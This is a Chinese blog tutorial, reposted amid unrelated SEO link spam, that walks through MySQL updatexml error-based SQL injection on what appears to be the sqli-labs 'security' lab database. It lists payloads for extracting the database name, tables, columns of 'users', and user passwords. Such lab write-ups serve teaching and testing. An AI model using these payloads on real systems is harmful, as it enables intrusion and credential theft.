当前位置: 首页 > news >正文

汕头做网站公司优化师和运营区别

汕头做网站公司,优化师和运营区别,游戏软件开发公司简介,深圳集团网站建设哪家好目录 1.updatexml报错原理 2.判断是否有注入点 我们在地址栏中输入?id1 我们在地址栏中输入?id1-- 3.updatexml报错注入 3.1爆库名 3.2爆表名 3.3爆字段名 3.4爆数据 1.updatexml报错原理 updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML…

目录

1.updatexml报错原理

2.判断是否有注入点

我们在地址栏中输入?id=1'

我们在地址栏中输入?id=1'--+

3.updatexml报错注入

3.1爆库名

3.2爆表名

3.3爆字段名

3.4爆数据


1.updatexml报错原理

updatexml(xml_doument,XPath_string,new_value)
第一个参数:XML的内容
第二个参数:是需要update的位置XPATH路径
第三个参数:是更新后的内容
所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。

2.判断是否有注入点

我们在地址栏中输入?id=1'

我们在地址栏中输入?id=1'--+

根据结果可以判断出存在数字型注入,并且页面会打印出报错信息,所以我们可以利用报错注入来解决

3.updatexml报错注入

3.1爆库名

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),0)

0x7e表示~符号,所以数据库名为security

3.2爆表名

mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。

在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。如果information_schema库被过滤掉,还可以尝试使用下述库来代替

sys.schema_auto_increment_columns 

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index 

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)

根据结果可知当前security库下有四张表,并且users表最有可能存放用户信息

3.3爆字段名

我们通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)

根据结果可以判断出字段名不全,这是因为updataxml函数只显示32位,所以我们可以用substr函数来慢慢截取来获得所有的字段名 

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_name='users'),0x7e),1)

这样我们最终会得到所有的字段名

如果我们给select语句多加一个where条件会变成什么样呢?

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

此次查询直接就爆出users表的列名,可以得到两个敏感字段就是username和password,最有可能存放用户的账号密码

3.4爆数据

?id=1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1)

通过limit函数可以爆出各个用户的密码

当然也可以通过刚刚所述的substr函数来截取密码

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,password),1,20) from users),0x7e),1)

此次updatexml报错注入就结束啦!

http://www.tj-hxxt.cn/news/22654.html

相关文章:

  • 做网站用什么ui美观seo也成搜索引擎优化
  • 怎么用一个主机做多个网站上海公布最新情况
  • 简单的网站建设公司的模板下载软文平台发布
  • 域名备案 网站名称电商广告
  • 河北省建设安全监督站的网站抚顺seo
  • 现在找个网站这么难的吗站长统计是什么意思
  • 重庆的公需科目在哪个网站做4p营销理论
  • 宝鸡网站制作公司淘宝客推广有效果吗
  • 做整装的网站网站seo优化报告
  • 东莞企业网站推广域名注册信息怎么查
  • 天津市城乡和住房建设厅网站浙江疫情最新情况
  • 个体户营业执照可以做网站吗站长平台工具
  • 万网网站备案系统网络服务提供者不是网络运营者
  • 学校网站建设目标百度云搜索引擎 百度网盘
  • 医院 网站建设市场推广
  • 东莞网站建设aj博客公司做个网站多少钱
  • 合肥网站建设认准 晨飞网络站长工具视频
  • 营销网站有多种类型宝鸡百度seo
  • 网站开发武胜招聘写文案接单平台
  • 苏州网站建设电话网络推广收费价目表
  • 怎么查询二级建造师注册情况谷歌seo 外贸建站
  • 中文企业网站模板css企业查询网站
  • 动态网站怎么做伪静态网站教育培训机构加盟
  • 外贸企业网站模版东莞网站推广排名
  • 网站建设教程 迅雷下载网络推广培训班哪家好
  • 购物网站建设 成都桔子seo
  • 抖音代运营服务内容明细铜川网站seo
  • 新品发布会策划方案pptseo教学视频教程
  • 建设银行网站怎么开通手机通知营销方案100例
  • 网站建设中++模板深圳百度推广排名优化